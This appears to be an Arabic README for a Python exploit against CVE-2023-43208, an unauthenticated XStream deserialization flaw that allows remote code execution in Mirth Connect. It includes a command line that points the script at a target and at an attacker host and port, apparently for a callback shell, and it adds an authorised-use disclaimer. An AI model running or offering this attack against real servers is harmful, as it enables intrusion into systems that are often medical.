
تطبيق بايثون لـ CVE-2023-43208 ثغرة تنفيذ الأوامر عن بُعد في Mirth Connect (بدون مصادقة عبر XStream)
يستغل هذا الاستغلال ثغرة إلغاء التسلسل الحرجة (deserialization) في محرك XStream الخاص بـ Mirth Connect. وهو ناتج عن تصحيح غير مكتمل لـ CVE-2023-37679، مما يتيح تنفيذ تعليمات برمجية عشوائية غير مصادق عليها في جميع الإصدارات السابقة للإصدار 4.4.1.
python3 mirth_rce.py https://{target} <attacker_host> <attacker_port>
هذا النص البرمجي للاستغلال مخصص لأغراض تعليمية بحتة ولتدقيق الأمن المصرح به لمساعدة المدافعين في تخفيف تأثير CVE-2023-43208؛ أي استخدام لهذه الأداة ضد أهداف غير مصرح بها هو غير قانوني وتقع المسؤولية بالكامل على المستخدم النهائي. يقدم المؤلف هذا البرنامج "كما هو" دون أي ضمانات، ويتبرأ من أي مسؤولية عن سوء الاستخدام أو الأضرار المحتملة، ولا يقر أو يشجع الأنشطة غير المصرح بها. استخدمه على مسؤوليتك الخاصة وفقط بما يتوافق مع القوانين المعمول بها.